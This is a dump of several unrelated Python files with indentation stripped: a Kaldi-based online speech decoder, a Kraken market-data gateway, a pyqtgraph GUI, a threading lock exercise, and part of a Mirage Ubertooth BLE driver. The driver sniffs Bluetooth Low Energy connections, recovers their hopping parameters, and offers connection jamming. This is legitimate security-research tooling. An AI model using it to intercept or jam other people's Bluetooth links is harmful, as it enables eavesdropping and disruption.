assert isinstance(latticeBeam,(int,float)) and latticeBeam > 0, "<latticeBeam> must be a positive float value."
assert isinstance(pruneInterval,int) and pruneInterval > 0, "<pruneInterval> must be a positive int value."
assert isinstance(beamDelta,(int,float)) and beamDelta > 0, "<beamDelta> must be a positive float value."
assert isinstance(hashRatio,(int,float)) and hashRatio > 0, "<hashRatio> must be a positive float value."
assert isinstance(pruneScale,(int,float)) and pruneScale > 0, "<pruneScale> must be a positive float value."
assert isinstance(acousticScale,(int,float)) and acousticScale > 0, "<acousticScale> must be a positive float value."
assert isinstance(lmScale,(int,float)) and lmScale > 0, "<lmScale> must be a positive float value."
assert isinstance(allowPartial,bool), "<allowPartial> must be a bool value."
assert isinstance(minDuration,(int,float)) and minDuration > 0, "<minDuration> must be a positive float value."
self.__acoustic_scale = acousticScale
assert isinstance(maxBatchSize,int) and maxBatchSize > 1
self.__max_batch_size = maxBatchSize
# Config the subprocess command
cmd = os.path.join( info.CMDROOT,"exkaldi-online-decoder ")
cmd += f" --beam {beam} " #1
cmd += f" --max-active {maxActive} " #3
cmd += f" --min-active {minActive} " #5
cmd += f" --lattice-beam {latticeBeam} " #7
cmd += f" --prune-interval {pruneInterval} " #9
cmd += f" --beam-delta {beamDelta} " #11
cmd += f" --hash-ratio {hashRatio} " #13
cmd += f" --prune-scale {pruneScale} " #15
cmd += f" --acoustic-scale {acousticScale} " #17
cmd += f" --lm-scale {lmScale} " #19
cmd += f" --chunk-frames {maxBatchSize} " #21
cmd += f" --allow-partial {allowPartial} " #23
cmd += f" --n-bests {nBests} " #25
cmd += f" --silence-phones {silencePhones} " #27
cmd += f" --frame-shift {frameShiftSec} " #29
cmd += f" --tmodel {tmodel} " #31
cmd += f" --fst {graph} " #33
cmd += f" --word-boundary {wordBoundary} " #35
cmd += f" --timeout { int(info.TIMEOUT*1000) } " #37
cmd += f" --timescale { int(info.TIMESCALE*1000) } " #39
self.__cmd = cmd
# Check the dim of probability
self.__pdfs = get_pdf_dim(tmodel)
# An optional rescoring function
self.rescore_function = None
# The main subprocess to run the decoding loop
self.__decodeProcess = None
# A thread to read results from decoding subprocess
self.__readResultThread = None
# A cache of packets awaiting results from the decoding subprocess
self.__packetCache = queue.Queue()
def reset(self):
super().reset()
self.__decodeProcess = None
self.__readResultThread = None
def ids_to_words(self,IDs):
assert isinstance(IDs,list)
result = []
for ID in IDs:
ID = str(ID)
if ID in self.__i2wLexicon.keys():
result.append( self.__i2wLexicon[ID] )
else:
result.append( "<UNK>" )
return " ".join(result)
def __read_result_from_subprocess(self):
'''
This function is used to open a thread to read result from main decoding process.
'''
timecost = 0
try:
while True:
# decide state and action
master, state = self.decide_state()
if state == mark.wrong:
break
elif state == mark.stranded:
time.sleep( info.TIMESCALE )
continue
elif state == mark.terminated:
if master == mark.outPIPE:
break
# if state is active or terminated (master is inPIPE)
# do the following steps
# Read
line = self.__decodeProcess.stdout.readline().decode().strip()
# nothing is received
if line == "":
time.sleep(info.TIMESCALE)
timecost += info.TIMESCALE
if timecost > info.TIMEOUT:
raise Exception(f"{self.name}: Timeout! Receiving thread has not received any data for a long time!")
else:
if line.startswith("-1"):
packet = self.__packetCache.get()
line = line[2:].strip().split() # discard the flag "-1"
if len(line) > 0:
packet.add( self.oKey[0], self.ids_to_words(line), asMainKey=True )
else:
packet.add( self.oKey[0], " ", asMainKey=True )
self.put_packet( packet )
## Endpoint
elif line.startswith("-2"):
packet = self.__packetCache.get()
line = line[2:].strip()
if len(line) == 0:
self.put_packet( packet )
else:
lines = line[2:].strip().split("-1") # discard the flag "-2 -1"
lines = [ line.strip().split() for line in lines if len(line.strip()) > 0 ]
if len(lines) == 0:
packet.add( self.oKey[0], " ", asMainKey=True )
elif len(lines) == 1:
packet.add( self.oKey[0], self.ids_to_words(lines[0]), asMainKey=True )
else:
# do not need to rescore
if self.rescore_function is None:
for i, line in enumerate(lines):
outKey = self.oKey[0] if i == 0 else ( self.oKey[0] + f"-{i+1}" )
packet.add( outKey, self.ids_to_words(line), asMainKey=True )
else:
nbestsInt = [ [ int(ID) for ID in line ] for line in lines ]  # each line is already a token list
nResults = self.rescore_function( nbestsInt )
assert isinstance(nResults,(list,tuple)) and len(nResults) > 0
for i,re in enumerate(nResults):
assert isinstance(re,(list,tuple)) and len(re) > 0
outKey = self.oKey[0] if i == 0 else ( self.oKey[0] + f"-{i+1}" )
packet.add( outKey, self.ids_to_words(re), asMainKey=True )
if not is_endpoint(packet):
self.put_packet( packet )
else:
self.put_packet( Endpoint(items=dict(packet.items()),cid=packet.cid,idmaker=packet.idmaker) )
## Final step
elif line.startswith("-3"):
break
else:
raise Exception(f"{self.name}: Expected flag (-1 -> partial) (-2 endpoint) (-3 termination) but got: {line}")
except Exception as e:
if not self.inPIPE.state_is_(mark.wrong,mark.terminated):
self.inPIPE.kill()
if not self.outPIPE.state_is_(mark.wrong,mark.terminated):
self.outPIPE.kill()
raise e
else:
if not self.inPIPE.state_is_(mark.wrong,mark.terminated):
self.inPIPE.terminate()
if not self.outPIPE.state_is_(mark.wrong,mark.terminated):
self.outPIPE.terminate()
finally:
self.__decodeProcess.stdout.close()
self.__decodeProcess.kill()
def core_loop(self):
# start core loop
try:
while True:
action = self.decide_action()
if action is False:
break
elif action is None:
# final step
try:
self.__decodeProcess.stdin.write(b" -3 ")
self.__decodeProcess.stdin.flush()
except Exception as e:
print(self.__decodeProcess.stderr.read().decode())
raise e
break
else:
packet = self.get_packet()
if is_endpoint(packet):
if packet.is_empty():
try:
self.__decodeProcess.stdin.write(b" -2 0 ")
self.__decodeProcess.stdin.flush()
except Exception as e:
print(self.__decodeProcess.stderr.read().decode())
raise e
else:
iKey = packet.mainKey if self.iKey is None else self.iKey
mat = packet[iKey]
assert isinstance(mat,np.ndarray) and len(mat.shape) == 2
assert mat.shape[0] <= self.__max_batch_size, "The chunk size of matrix > max allowable batch size of this decoder."
assert mat.shape[1] == self.__pdfs, "The dim. of probability does not match the PDFs."
mat = self.__acoustic_scale * mat
header = f" -2 {mat.shape[0]} ".encode()
inputs = header + encode_vector_temp( mat.reshape(-1) )
try:
self.__decodeProcess.stdin.write(inputs)
self.__decodeProcess.stdin.flush()
except Exception as e:
print(self.__decodeProcess.stderr.read().decode())
raise e
self.__packetCache.put( packet )
else:
if packet.is_empty():
continue
else:
iKey = packet.mainKey if self.iKey is None else self.iKey
mat = packet[iKey]
assert isinstance(mat,np.ndarray) and len(mat.shape) == 2
assert mat.shape[0] <= self.__max_batch_size, "The chunk size of matrix > max allowable batch size of this decoder."
assert mat.shape[1] == self.__pdfs, "The dim. of probability does not match the PDFs."
mat = self.__acoustic_scale * mat
header = f" -1 {mat.shape[0]} ".encode()
inputs = header + encode_vector_temp( mat.reshape(-1) )
try:
self.__decodeProcess.stdin.write(inputs)
self.__decodeProcess.stdin.flush()
except Exception as e:
print(self.__decodeProcess.stderr.read().decode())
raise e
self.__packetCache.put( packet )
# Wait until all results have been received.
self.__readResultThread.join()
# Close the decoding process
self.__decodeProcess.stdin.write(b"over")
finally:
self.__decodeProcess.stdout.close()
self.__decodeProcess.kill()
def _create_thread(self,func):
# open exkaldi online decoding process
self.__decodeProcess = subprocess.Popen(self.__cmd,shell=True,stdin=subprocess.PIPE,stdout=subprocess.PIPE,stderr=subprocess.PIPE)
# open reading result thread
self.__readResultThread = threading.Thread(target=self.__read_result_from_subprocess)
self.__readResultThread.setDaemon(True)
self.__readResultThread.start()
coreThread = threading.Thread(target=func)
coreThread.setDaemon(True)
coreThread.start()
return coreThread
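# Construction sketch (not called anywhere) for WfstDecoder. All paths below are
# hypothetical and would normally point at a trained Kaldi transition model, an HCLG
# graph and the matching words.txt / word-boundary files.
def _sketch_build_decoder():
    return WfstDecoder(
        symbolTable="exp/graph/words.txt",
        silencePhones="1:2:3:4:5",
        frameShiftSec=0.01,
        tmodel="exp/model/final.mdl",
        graph="exp/graph/HCLG.fst",
        wordBoundary="exp/graph/word_boundary.int",
        nBests=10,
        acousticScale=0.1,
    )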
def dump_text_PIPE(pipe,key=None,allowPartial=True,endSymbol="\n"):
'''
Dump a text PIPE to a transcription.
'''
assert isinstance(allowPartial,bool)
assert isinstance(endSymbol,str)
assert pipe.state_is_(mark.wrong,mark.terminated), "<pipe> must be wrong or terminated PIPE."
assert not pipe.is_outlocked()
if key is not None:
assert isinstance(key,str)
result = []
memory = None
while True:
if pipe.is_empty():
break
else:
packet = pipe.get()
if not packet.is_empty():
iKey = packet.mainKey if key is None else key
text = packet[iKey]
assert isinstance(text,str)
memory = text
if is_endpoint(packet):
if memory is None:
continue
else:
result.append(memory)
memory = None
if allowPartial and (memory is not None):
result.append( memory )
return endSymbol.join(result)
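# Usage sketch (not called anywhere): once the pipeline has finished, a text PIPE can be
# flattened into a plain transcription. `pipe` is assumed to be a wrong or terminated
# PIPE object from this framework, e.g. the decoder's output PIPE.
def _sketch_dump_results(pipe):
    # One line per endpoint-delimited utterance, partial hypotheses included.
    return dump_text_PIPE(pipe, key=None, allowPartial=True, endSymbol="\n")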
|
kraken.py
|
from befh.restful_api_socket import RESTfulApiSocket
from befh.exchanges.gateway import ExchangeGateway
from befh.market_data import L2Depth, Trade
from befh.instrument import Instrument
from befh.util import Logger
import time
import threading
from functools import partial
from datetime import datetime
class ExchGwKrakenRestfulApi(RESTfulApiSocket):
"""
Exchange socket
"""
def __init__(self, proxy=None):
self.proxy = proxy
RESTfulApiSocket.__init__(self, proxy=proxy)
@classmethod
def get_bids_field_name(cls):
return 'bids'
@classmethod
def get_asks_field_name(cls):
return 'asks'
@classmethod
def get_order_book_link(cls, instmt):
return 'https://api.kraken.com/0/public/Depth?pair=%s&count=5' % instmt.get_instmt_code()
@classmethod
def get_trades_link(cls, instmt):
if instmt.get_exch_trade_id() != '' and instmt.get_exch_trade_id() != '0':
return 'https://api.kraken.com/0/public/Trades?pair=%s&since=%s' % \
(instmt.get_instmt_code(), instmt.get_exch_trade_id())
else:
return 'https://api.kraken.com/0/public/Trades?pair=%s' % instmt.get_instmt_code()
@classmethod
def parse_l2_depth(cls, instmt, raw):
"""
Parse raw data to L2 depth
:param instmt: Instrument
:param raw: Raw data in JSON
"""
l2_depth = L2Depth()
keys = list(raw.keys())
if cls.get_bids_field_name() in keys and \
cls.get_asks_field_name() in keys:
# Bids
bids = raw[cls.get_bids_field_name()]
bids = sorted(bids, key=lambda x: x[0], reverse=True)
for i in range(0, len(bids)):
l2_depth.bids[i].price = float(bids[i][0]) if not isinstance(bids[i][0], float) else bids[i][0]
l2_depth.bids[i].volume = float(bids[i][1]) if not isinstance(bids[i][1], float) else bids[i][1]
# Asks
asks = raw[cls.get_asks_field_name()]
asks = sorted(asks, key=lambda x: x[0])
for i in range(0, len(asks)):
l2_depth.asks[i].price = float(asks[i][0]) if not isinstance(asks[i][0], float) else asks[i][0]
l2_depth.asks[i].volume = float(asks[i][1]) if not isinstance(asks[i][1], float) else asks[i][1]
return l2_depth
@classmethod
def parse_trade(cls, instmt, raw):
"""
:param instmt: Instrument
:param raw: Raw data in JSON
:return:
"""
trade = Trade()
# Trade price
trade.trade_price = float(str(raw[0]))
# Trade volume
trade.trade_volume = float(str(raw[1]))
# Timestamp
date_time = float(raw[2])
trade.date_time = datetime.utcfromtimestamp(date_time).strftime("%Y%m%d %H:%M:%S.%f")
# Trade side
trade.trade_side = Trade.parse_side(raw[3])
# Trade id
trade.trade_id = trade.date_time + '-' + str(instmt.get_exch_trade_id())
return trade
@classmethod
def get_order_book(cls, instmt, proxy=None):
"""
Get order book
:param instmt: Instrument
:return: Object L2Depth
"""
res = cls.request(cls.get_order_book_link(instmt), proxy=proxy)
if len(res) > 0 and 'error' in res and len(res['error']) == 0:
res = list(res['result'].values())[0]
return cls.parse_l2_depth(instmt=instmt,
raw=res)
else:
Logger.error(cls.__name__, "Cannot parse the order book. Return:\n%s" % res)
return None
@classmethod
def get_trades(cls, instmt, proxy=None):
"""
Get trades
:param instmt: Instrument
:param trade_id: Trade id
:return: List of trades
"""
res = cls.request(cls.get_trades_link(instmt), proxy=proxy)
trades = []
if len(res) > 0 and 'error' in res and len(res['error']) == 0:
res = res['result']
if 'last' in res.keys():
instmt.set_exch_trade_id(res['last'])
del res['last']
res = list(res.values())[0]
for t in res:
trade = cls.parse_trade(instmt=instmt,
raw=t)
trades.append(trade)
return trades
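# Illustrative sketch (not called anywhere) of how parse_trade consumes one raw entry from
# Kraken's public Trades endpoint, which returns per-trade arrays of the form
# [price, volume, time, side, ...]. `instmt` is assumed to be a configured Instrument and
# the numbers below are made up.
def _sketch_parse_kraken_trade(instmt):
    raw_trade = ["3500.10000", "0.02500000", 1500000000.1234, "b"]
    trade = ExchGwKrakenRestfulApi.parse_trade(instmt=instmt, raw=raw_trade)
    # trade.trade_price == 3500.1, trade.trade_volume == 0.025, trade.trade_side parsed
    # from the "b" (buy) flag, and trade.date_time formatted as "%Y%m%d %H:%M:%S.%f".
    return trade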
class ExchGwKraken(ExchangeGateway):
"""
Exchange gateway
"""
def __init__(self, db_clients, proxy=None):
"""
Constructor
:param db_client: Database client
"""
ExchangeGateway.__init__(self, ExchGwKrakenRestfulApi(proxy=proxy), db_clients)
@classmethod
def get_exchange_name(cls):
"""
Get exchange name
:return: Exchange name string
"""
return 'Kraken'
def get_order_book_worker(self, instmt):
"""
Get order book worker
:param instmt: Instrument
"""
while True:
try:
l2_depth = self.api_socket.get_order_book(instmt, proxy=self.api_socket.proxy)
if l2_depth is not None and l2_depth.is_diff(instmt.get_l2_depth()):
instmt.set_prev_l2_depth(instmt.l2_depth.copy())
instmt.set_l2_depth(l2_depth)
instmt.incr_order_book_id()
self.insert_order_book(instmt)
except Exception as e:
Logger.error(self.__class__.__name__,
"Error in order book: %s" % e)
time.sleep(0.5)
def get_trades_worker(self, instmt):
"""
Get trades worker thread
:param instmt: Instrument name
"""
instmt.set_recovered(False)
while True:
ret = []
try:
ret = self.api_socket.get_trades(instmt, proxy=self.api_socket.proxy)
for trade in ret:
instmt.incr_trade_id()
self.insert_trade(instmt, trade)
# After the first time of getting the trade, indicate the instrument
# is recovered
if not instmt.get_recovered():
instmt.set_recovered(True)
except Exception as e:
Logger.error(self.__class__.__name__,
"Error in trades: %s\nReturn: %s" % (e, ret))
time.sleep(0.5)
def start(self, instmt):
"""
Start the exchange gateway
:param instmt: Instrument
:return List of threads
"""
instmt.set_prev_l2_depth(L2Depth(5))
instmt.set_l2_depth(L2Depth(5))
instmt.set_instmt_snapshot_table_name(self.get_instmt_snapshot_table_name(instmt.get_exchange_name(),
instmt.get_instmt_name()))
self.init_instmt_snapshot_table(instmt)
t1 = threading.Thread(target=partial(self.get_order_book_worker, instmt))
t1.start()
t2 = threading.Thread(target=partial(self.get_trades_worker, instmt))
t2.start()
return [t1, t2]
|
slicer_gui.py
|
import threading
import numpy as np
import json
import sys
import os
import pyqtgraph as pg
from pyqtgraph.Qt import QtGui, QtCore
from pyqtgraph.Point import Point
import traceback
from slicer_constants import MIN_X, MAX_X, POS, SET_SPOTS, SET_REGION, PLAYBACK_MARKER, TIME_IN_HISTORY
spots = [{POS: [0, 0]}, {POS: [2, 1]}]
region = None
scatter_plot = None
# playback_marker_scatter = None
def eprint(*args, **kwargs):
print(*args, file=sys.stderr, **kwargs)
sys.stderr.flush()
def update():
global region
region.setZValue(10)
min_x, max_x = region.getRegion()
print(json.dumps({MIN_X: min_x, MAX_X: max_x}))
sys.stdout.flush()
def set_spots(spots_json):
global spots
spots = spots_json
scatter_plot.setData(spots)
def set_region(region_json):
global spots
global region
min_x = region_json[MIN_X]
max_x = region_json[MAX_X]
if not np.isfinite(min_x): min_x = min(spot[POS][0] for spot in spots)
if not np.isfinite(max_x): max_x = max(spot[POS][0] for spot in spots)
region.setRegion([min_x, max_x])
def set_playback_marker(playback_marker_json):
global playback_marker
global view_box
# Note: the code below makes the GUI freeze after a while for unknown reasons, so it is disabled.
# time_in_history = playback_marker_json[TIME_IN_HISTORY]
# if time_in_history < -1000:
# return
# min_x, max_x = region.getRegion()
# time_in_history = min(max_x, max(min_x, time_in_history))
# playback_spots = [ {POS: (time_in_history, i)} for i in range(7) ]
# playback_marker_scatter.setData(playback_spots)
# eprint(time_in_history)
# playback_marker.setPos((time_in_history,0))
# eprint (playback_marker_json)
def read_input():
try:
while True:
try:
line = input()
except EOFError as e:
return
message = json.loads(line)
if SET_SPOTS in message:
set_spots(message[SET_SPOTS])
elif SET_REGION in message:
set_region(message[SET_REGION])
elif PLAYBACK_MARKER in message:
set_playback_marker(message[PLAYBACK_MARKER])
else:
eprint('bad message: ', message)
except Exception as e:
traceback.print_exc()
sys.stderr.flush()
os._exit(-1)  # hard-exit the whole process; os.exit() does not exist and sys.exit() would only end this thread
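# The GUI is driven by newline-delimited JSON on stdin and reports the selected region as
# JSON on stdout. A hypothetical helper for the parent process is sketched below; the
# literal key names come from slicer_constants, which is not shown here.
def _sketch_send_set_region(proc_stdin, min_x, max_x):
    # Ask the slicer to move its selection region to [min_x, max_x].
    proc_stdin.write(json.dumps({SET_REGION: {MIN_X: min_x, MAX_X: max_x}}) + "\n")
    proc_stdin.flush()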
class NonFocusStealingGraphicsWindow(pg.GraphicsWindow):
def show(self):
self.setAttribute(98) # Qt::WA_ShowWithoutActivating
super().show()
def main():
global region
global scatter_plot
global view_box
# window layout
app = QtGui.QApplication([])
win = NonFocusStealingGraphicsWindow(title='Slicer')
win.setGeometry(0, 660, 600, 380)
label = pg.LabelItem(justify='right')
win.addItem(label)
view_box = win.addPlot(row=1, col=0)
region = pg.LinearRegionItem()
region.setZValue(10)
region.sigRegionChanged.connect(update)
# Add the LinearRegionItem to the ViewBox, but tell the ViewBox to exclude this
# item when doing auto-range calculations.
view_box.addItem(region, ignoreBounds=True)
# pg.dbg()
scatter_plot = pg.ScatterPlotItem(size=10, pen=pg.mkPen(None), brush=pg.mkBrush(255, 255, 255, 120))
set_spots(spots)
view_box.addItem(scatter_plot)
# playback_marker = pg.InfiniteLine(pos=(0,0), angle=30)
# view_box.addItem(playback_marker)
# global playback_marker_scatter
# playback_marker_scatter = pg.ScatterPlotItem(size=10, pen=pg.mkPen(None), brush=pg.mkBrush(255, 255, 255, 120))
# view_box.addItem(playback_marker_scatter)
threading.Thread(target=read_input, daemon=True).start()
# Start Qt event loop unless running in interactive mode or using pyside.
if (sys.flags.interactive != 1) or not hasattr(QtCore, 'PYQT_VERSION'):
QtGui.QApplication.instance().exec_()
if __name__ == '__main__':
main()
|
foo.py
|
# Python 3.3.3 and 2.7.6
# python foo.py
from threading import Thread
import threading
# Potentially useful thing:
# In Python you "import" a global variable, instead of "export"ing it when you declare it
# (This is probably an effort to make you feel bad about typing the word "global")
i = 0
i_lock = threading.Lock()
def incrementingFunction():
global i
# Increment i 1,000,000 times, taking the lock for each update
for j in range(1000000):
i_lock.acquire()
i += 1
i_lock.release()
def decrementingFunction():
global i
# Decrement i 1,000,000 times, taking the lock for each update
for j in range(1000000):
i_lock.acquire()
i -= 1
i_lock.release()
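# Equivalent, slightly more idiomatic variant (not wired into main()): threading.Lock is a
# context manager, so the acquire/release pair can be written as a "with" block.
def incrementingFunctionWithStatement():
    global i
    for j in range(1000000):
        with i_lock:
            i += 1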
def main():
global i
incrementing = Thread(target = incrementingFunction, args = (),)
decrementing = Thread(target = decrementingFunction, args = (),)
# TODO: Start both threads
incrementing.start()
decrementing.start()
incrementing.join()
decrementing.join()
print("The magic number is %d" % (i))
main()
|
ubertooth.py
|
from scapy.all import *
import struct
from mirage.libs.bt_utils.ubertooth import *
from mirage.libs.ble_utils.constants import *
from mirage.libs.ble_utils import helpers
from mirage.libs import utils,io,wireless
class BLEUbertoothDevice(BtUbertoothDevice):
'''
This device allows communication with an Ubertooth device in order to sniff the Bluetooth Low Energy protocol.
The corresponding interfaces are : ``ubertoothX`` (e.g. "ubertooth0")
The following capabilities are currently supported :
+-----------------------------------+----------------+
| Capability | Available ? |
+===================================+================+
| SCANNING | yes |
+-----------------------------------+----------------+
| ADVERTISING | no |
+-----------------------------------+----------------+
| SNIFFING_ADVERTISEMENTS | yes |
+-----------------------------------+----------------+
| SNIFFING_NEW_CONNECTION | yes |
+-----------------------------------+----------------+
| SNIFFING_EXISTING_CONNECTION | yes |
+-----------------------------------+----------------+
| JAMMING_CONNECTIONS | yes |
+-----------------------------------+----------------+
| JAMMING_ADVERTISEMENTS | no |
+-----------------------------------+----------------+
| HIJACKING_CONNECTIONS | no |
+-----------------------------------+----------------+
| INITIATING_CONNECTION | no |
+-----------------------------------+----------------+
| RECEIVING_CONNECTION | no |
+-----------------------------------+----------------+
| COMMUNICATING_AS_MASTER | no |
+-----------------------------------+----------------+
| COMMUNICATING_AS_SLAVE | no |
+-----------------------------------+----------------+
| HCI_MONITORING | no |
+-----------------------------------+----------------+
'''
sharedMethods = [
"getFirmwareVersion",
"getDeviceIndex",
"getMode",
"getSerial",
"setChannel",
"setCRCChecking",
"setScanInterval",
"setScan",
"setJamming",
"isSynchronized",
"getChannel",
"getAccessAddress",
"getCrcInit",
"getChannelMap",
"getHopInterval",
"getHopIncrement",
"setSweepingMode",
"sniffNewConnections",
"sniffExistingConnections",
"sniffAdvertisements"
]
def _initBLE(self):
self.jamming = False
self.synchronized = False
self.sweepingMode = False
self.sniffingMode = None
self.sweepingSequence = []
self.sweepingThreadInstance = None
self.scanThreadInstance = None
self._stop()
self.channel = 37
self.accessAddress = None
self.crcInit = None
self.channelMap = None
self.hopInterval = None
self.hopIncrement = None
self._setCRCChecking(False)
self.setCRCChecking(enable=False)
self.setScanInterval(seconds=2)
self._resetClock()
self._setJamMode(JAM_NONE)
self._setModulation()
self._start()
self.capabilities = ["SCANNING", "SNIFFING_ADVERTISEMENTS", "SNIFFING_EXISTING_CONNECTION", "SNIFFING_NEW_CONNECTION","JAMMING_CONNECTIONS"]
io.success("Ubertooth Device ("+self.interface+") successfully instantiated !")
def _sweepingThread(self):
for channel in self.sweepingSequence:
if ((self.sniffingMode == BLESniffingMode.NEW_CONNECTION and not self.synchronized) or
self.sniffingMode == BLESniffingMode.ADVERTISEMENT):
self.setChannel(channel=channel)
utils.wait(seconds=0.1)
def _startSweepingThread(self):
self._stopSweepingThread()
self.sweepingThreadInstance = wireless.StoppableThread(target=self._sweepingThread)
self.sweepingThreadInstance.start()
def _stopSweepingThread(self):
if self.sweepingThreadInstance is not None:
self.sweepingThreadInstance.stop()
self.sweepingThreadInstance = None
def setSweepingMode(self,enable=True,sequence=[37,38,39]):
'''
This method enables or disables the sweeping mode, which monitors a given subset of advertising channels sequentially.
:param enable: boolean indicating if the Sweeping mode is enabled.
:type enable: bool
:param sequence: sequence of channels to use
:type sequence: list of int
.. note::
This method is a **shared method** and can be called from the corresponding Emitters / Receivers.
'''
self.sweepingMode = enable
if enable:
self.sweepingSequence = sequence
self._startSweepingThread()
else:
self._stopSweepingThread()
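# Illustrative usage (assuming `device` is an instantiated BLEUbertoothDevice):
# >>> device.setSweepingMode(enable=True, sequence=[37, 39])  # hop between channels 37 and 39
# >>> device.setSweepingMode(enable=False)                    # stop sweeping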
def isSynchronized(self):
'''
This method indicates whether the sniffer is currently synchronized with a connection.
:return: boolean indicating if the sniffer is synchronized
:rtype: bool
:Example:
>>> device.isSynchronized()
True
.. note::
This method is a **shared method** and can be called from the corresponding Emitters / Receivers.
'''
return self.synchronized and self.accessAddress is not None and self.crcInit is not None and self.channelMap is not None and self.hopIncrement is not None and self.hopInterval is not None
def setJamming(self,enable=True):
'''
This method enables or disables the jamming mode.
:param enable: boolean indicating if the jamming mode must be enabled or disabled
:type enable: bool
:Example:
>>> device.setJamming(enable=True) # jamming mode enabled
>>> device.setJamming(enable=False) # jamming mode disabled
.. note::
This method is a **shared method** and can be called from the corresponding Emitters / Receivers.
'''
self.jamming = enable
def _setAccessAddress(self,accessAddress=None):
self.accessAddress = accessAddress
def _setCrcInit(self,crcInit=None):
self.crcInit = crcInit
def _setChannelMap(self,channelMap=None):
self.channelMap = channelMap
def _setHopInterval(self,hopInterval=None):
self.hopInterval = hopInterval
def _getHopInterval(self):
return self.hopInterval
def _setHopIncrement(self,hopIncrement):
self.hopIncrement = hopIncrement
def _getHopIncrement(self):
return self.hopIncrement
def _getChannelMap(self):
return self.channelMap
def _getAccessAddress(self):
return self.accessAddress
def _getCrcInit(self):
return self.crcInit
def getAccessAddress(self):
'''
This method returns the access address currently in use.
:return: access address
:rtype: int
:Example:
>>> hex(device.getAccessAddress())
'0xe5e296e9'
.. note::
This method is a **shared method** and can be called from the corresponding Emitters / Receivers.
'''
return self.accessAddress
def getCrcInit(self):
'''
This method returns the CRCInit currently in use.
:return: CRCInit
:rtype: int
:Example:
>>> hex(device.getCrcInit())
'0x0bd54a'
.. note::
This method is a **shared method** and can be called from the corresponding Emitters / Receivers.
'''
return self.crcInit
def getChannelMap(self):
'''
This method returns the Channel Map currently in use.
:return: Channel Map
:rtype: int
:Example:
>>> hex(device.getChannelMap())
'0x1fffffffff'
.. note::
This method is a **shared method** and can be called from the corresponding Emitters / Receivers.
'''
return self.channelMap
def getHopInterval(self):
'''
This method returns the Hop Interval currently in use.
:return: Hop Interval
:rtype: int
:Example:
>>> device.getHopInterval()
36
.. note::
This method is a **shared method** and can be called from the corresponding Emitters / Receivers.
'''
return self.hopInterval
def getHopIncrement(self):
'''
This method returns the Hop Increment currently in use.
:return: Hop Increment
:rtype: int
:Example:
>>> device.getHopIncrement()
11
.. note::
This method is a **shared method** and can be called from the corresponding Emitters / Receivers.
'''
return self.hopIncrement
def _updateAccessAddress(self,accessAddress=None):
io.success("Access Address selected : "+"0x{:08x}".format(accessAddress))
self._setAccessAddress(accessAddress)
io.info("Recovering CRCInit ...")
def _updateCrcInit(self,crcInit=None):
io.success("CRCInit successfully recovered : "+"0x{:06x}".format(crcInit))
self._setCrcInit(crcInit)
io.info("Recovering Channel Map ...")
def _updateChannelMap(self,channelMap=None):
channelMap = 0x1fffffffff
io.info("Ubertooth can only sniff connections with channel map : "+"0x{:10x}".format(channelMap))
io.success("Channel Map successfully updated : "+"0x{:10x}".format(channelMap))
self._setChannelMap(channelMap)
io.info("Recovering Hop Interval ...")
def _updateHopInterval(self,hopInterval=None):
io.success("Hop Interval successfully recovered : "+str(hopInterval))
self._setHopInterval(hopInterval)
io.info("Recovering Hop Increment ...")
def _updateHopIncrement(self,hopIncrement=None):
io.success("Hop Increment successfully recovered : "+str(hopIncrement))
self._setHopIncrement(hopIncrement)
io.info("All parameters recovered, following connection ...")
def stop(self):
super()._stop()
self.ubertooth.close()
def init(self):
self.initializeBluetooth = False
self.sniffingMode = BLESniffingMode.EXISTING_CONNECTION
super().init()
if self.ubertooth is not None:
self._initBLE()
self.ready = True
def setCRCChecking(self,enable=True):
'''
This method enables or disables CRC checking.
:param enable: boolean indicating if CRC Checking must be enabled
:type enable: bool
:Example:
>>> device.setCRCChecking(enable=True) # CRC Checking enabled
>>> device.setCRCChecking(enable=False) # CRC Checking disabled
.. note::
This method is a **shared method** and can be called from the corresponding Emitters / Receivers.
'''
self.crcEnabled = enable
def getSerial(self):
'''
This method returns the device's serial number.
:return: device's serial number
:rtype: str
:Example:
>>> device.getSerial()
'1160010b201835ae6d474553-79e1ff0b'
.. note::
This method is a **shared method** and can be called from the corresponding Emitters / Receivers.
'''
self.lock.acquire()
serial = self._getSerial()
self.lock.release()
return serial
def getMode(self):
'''
This method returns the mode currently in use on the Ubertooth device ("Bt" or "BLE").
:return: string indicating the mode
:rtype: str
:Example:
>>> device.getMode()
"BLE"
.. note::
This method is a **shared method** and can be called from the corresponding Emitters / Receivers.
'''
return "BLE"
def getChannel(self):
'''
This method returns the channel currently in use.
:return: channel in use
:rtype: int
:Example:
>>> device.getChannel()
37
>>> device.setChannel(channel=38)
>>> device.getChannel()
38
.. note::
This method is a **shared method** and can be called from the corresponding Emitters / Receivers.
'''
return self.channel
def setChannel(self, channel=37):
'''
This method changes the channel currently in use to the provided channel.
:param channel: new channel
:type channel: int
:Example:
>>> device.getChannel()
37
>>> device.setChannel(channel=38)
>>> device.getChannel()
38
.. note::
This method is a **shared method** and can be called from the corresponding Emitters / Receivers.
'''
if channel is not None and channel != self.channel:
frequency = helpers.channelToFrequency(channel)
self.channel = channel
self.lock.acquire()
self._stop()
self._setFrequency(frequency)
self._start()
self.lock.release()
def restartSniffingMode(self):
'''
This method restarts the sniffing mode.
:Example:
>>> device.restartSniffingMode()
.. note::
This method is a **shared method** and can be called from the corresponding Emitters / Receivers.
'''
if self.sniffingMode == BLESniffingMode.NEW_CONNECTION:
self.sniffNewConnections()
else:
self.sniffExistingConnections()
def sniffAdvertisements(self,address="00:00:00:00:00:00",channel=None):
'''
This method starts the advertisement sniffing mode.
:param address: selected address - if not provided, no filter is applied (format : "1A:2B:3C:4D:5E:6F")
:type address: str
:param channel: selected channel - if not provided, channel 37 is selected
:type channel: int
:Example:
>>> device.sniffAdvertisements()
>>> device.sniffAdvertisements(channel=38)
>>> device.sniffAdvertisements(address="1A:2B:3C:4D:5E:6F")
.. note::
This method is a **shared method** and can be called from the corresponding Emitters / Receivers.
'''
self.sniffingMode = BLESniffingMode.ADVERTISEMENT
self.synchronized = False
self.lock.acquire()
self._stop()
self._setTarget(address)
self._setCRCChecking(True)
self.setCRCChecking(True)
self._start()
self.lock.release()
if channel is None:
channel = 37
if not self.sweepingMode:
self.setChannel(channel)
def sniffNewConnections(self,address="00:00:00:00:00:00",channel=None):
'''
This method starts the new connections sniffing mode.
:param address: selected address - if not provided, no filter is applied (format : "1A:2B:3C:4D:5E:6F")
:type address: str
:param channel: selected channel - if not provided, channel 37 is selected
:type channel: int
:Example:
>>> device.sniffNewConnections()
>>> device.sniffNewConnections(channel=38)
